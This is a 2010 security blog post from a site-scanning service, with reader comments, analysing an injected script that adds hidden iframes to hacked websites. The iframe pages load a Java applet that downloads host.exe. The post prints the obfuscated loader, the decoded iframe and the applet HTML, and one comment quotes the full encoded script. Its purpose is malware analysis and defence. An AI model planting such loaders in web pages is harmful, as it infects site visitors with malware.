msgbartop
Unmask Parasites - Check your web pages for hidden links, iframes, malicious scripts, unauthorized redirects and other signs of security problems.
msgbarbottom
Loading site search ...

Injected Script Loads Host.exe Using Hidden Iframes and Java Applets

   27 Dec 10   Filed in Short Attack Reviews, Website exploits

Today, I can see many blacklisted sites where Google report one of the following three domains as a source of the problem:

  • aubreyserr .com
  • medien-verlag .de
  • yennicq .be

E.g.

Malicious software is hosted on 1 domain(s), including medien-verlag.de/.

The attack is quite interesting so I decided to share results of my initial investigation here.

On infected sites, I found an obfuscated malicious script at the very bottom of HTML code

document .write('\u003C\u0049\u0046\u0052\u0041\u004D\u0045\u0020\u006E\u0061\u006D...skipped...\u0074\u0068\u003D\u0022\u0031\u0022\u0020\u006D\u0061\u0072\u0067\u0069\u006E\u0068\u0065\u0069\u0067\u0068\u0074\u003D\u0022\u0031\u0022\u003E\u003C\u002F\u0049\u0046\u0052\u0041\u004D\u0045\u003E');

Unmask Parasites detects the injected malicious scripts quite well. Here you can see how it looks in a sample report:

Unmask Parasites report

When people load the infected pages, this code injects a hidden iframe

<IFR AME name="x" src="http://www.medien-verlag .de/ new.htm" width="0" height="0" scrolling="no" frameborder="0" marginwidth="1" marginheight="1"></IFRAM E>

In other variations, the iframe may be from www.aubreyserr .com/ new.htm or www.yennicq .be/ new.htm.

The page loaded by the iframe is very simple

<html>
<body>
<ap plet name="Java Update" code="Polat.class" archive="Hidden.jar" height="10" width="1">
<param name="url" value="hxxp://www.medien-verlag .de/ host.exe">
</applet>
</p>
<p></p>
</div>
</body></html>

As you can see, it only loads a Java Applet Hidde.jar with one parameter that point to the “host.exe” file in the root of the same site.

VirusTotal

I decided to check the files using VirusTotal to find out how different anti-virus tools detect them.

Hidden.jar

Hidden.jar

Only 10 out of 36 tools consider this file malicious. Most of them recognize it as some sort of “Java Downloader“. So I guess all it does is downloading another malicious file onto a victim’s computer. In this case, the file that’s being downloaded is that “host.exe“. So let’s check this file.

Host.exe

www.medien-verlag.de/host.exe

24 out of 43 www.medien-verlag.de/host.exe as malicious. Quite poor detection rate. The following popular AV tools still can’t detect it 11 hours after my initial VirusTotal check: Avast, Kaspersky, Microsoft, Sophos, TrendMicro.

So what about host.exe files from other sites? They seems to be different on each site.

Right now 30 out of 42 tools detect www.yennicq .be/host.exe it as malicious. All major anti-viruses (except for Kaspersky and Microsoft) do a good job here.

www.yennicq.be/host.exe

www.aubreyserr .com/host.exe does quite well too: 30 out of 43.

www.aubreyserr .com/host.exe

Malware hosted on legitimate websites

I should also mention that all three domains belong to legitimate websites on three different servers. Once again (as in Gumblar and Koobface), hackers use compromised sites to host malicious files and use them to attack visitors to hacked third-party sites.

Prevalence

According to Google’s Safe Browsing project, there are currently about 2,000 known infected sites:

You help is welcome

I’ve only started this investigation today, so a lot remains unclear. E.g. what security hole is used to compromise affected sites? Is the injected script the only modification to the hacked sites? Are there any other domains involved in this attack? etc. If you have answers to these questions or just want to share your thoughts, please join the discussion in the comments.

Related posts:

Reader's Comments (8)

  1. |

    [...] This post was mentioned on Twitter by Denis. Denis said: [blog] Injected Script Loads Host.exe Using Hidden Iframes and Java Applets http://bit.ly/eq1At2 – more info required [...]

  2. |

    Some of the sites hosted at the data center got infected too. Here is the script they changed in index.html and index.php.

    document write(‘\u003C\u0049\u0046\u0052\u0041\u004D\u0045\u0020\u006E\u0061\u006D\u0065\u003D\u0022\
    u0078\u0022\u0020\u0073\u0072\u0063\u003D\u0022\u0068\u0074\u0074\u0070\u003A\u002F\u002F\u0077\u0077\u0077\u002E\u006E\u0061\u0072\
    u0063\u006F\u0073\u002E\u006E\u006C\u002F\u006E\u0065\u0077\u002E\u0068\u0074\u006D\u0022\u0020\u0077\u0069\u0064\u0074\u0068\u003D\
    u0022\u0030\u0022\u0020\u0068\u0065\u0069\u0067\u0068\u0074\u003D\u0022\u0030\u0022\u0020\u0073\u0063\u0072\u006F\u006C\u006C\u0069\
    u006E\u0067\u003D\u0022\u006E\u006F\u0022\u0020\u0066\u0072\u0061\u006D\u0065\u0062\u006F\u0072\u0064\u0065\u0072\u003D\u0022\u0030\
    u0022\u0020\u006D\u0061\u0072\u0067\u0069\u006E\u0077\u0069\u0064\u0074\u0068\u003D\u0022\u0031\u0022\u0020\u006D\u0061\u0072\u0067\
    u0069\u006E\u0068\u0065\u0069\u0067\u0068\u0074\u003D\u0022\u0031\u0022\u003E\u003C\u002F\u0049\u0046\u0052\u0041\u004D\u0045\u003E’
    );

    The files are changed on 23rd Dec 2010 around 11:48 PM.

    • |

      Thanks.

      The code translates to a similar iframe from “hxxp://www .narcos .nl/ new.htm”

  3. |

    SANS ISC has a blog post on what looks like the same malware http://isc.sans.edu/diary.html?storyid=10168

    • |

      Indeed, the same malware. It has more detailed information on how the malicious Java downloader works.

      A few more malicious URLs from that post.
      hxxp://benaguasil. net/ new.htm
      hxxp://mavi1. org/ new.htm

  4. |

    I’ve been hacked too.
    I had several ‘domains’ hosted on that account, but they only changed 2 index.php files with that redirect.

    I think they entered trough a sketchup document I hosted, but i have no idea how.

  5. |

    get hacked again and this time it is from
    hxxp://caktu.com/new.htm

    The hacker comes in through http port. Still finding out how did in hacked in.

  6. |

    I was wondering if the “hosts.exe” causes your Windows’ hosts file to load an acceptable host domain which otherwise would be rejected.
    Anyhow, just a wild thought.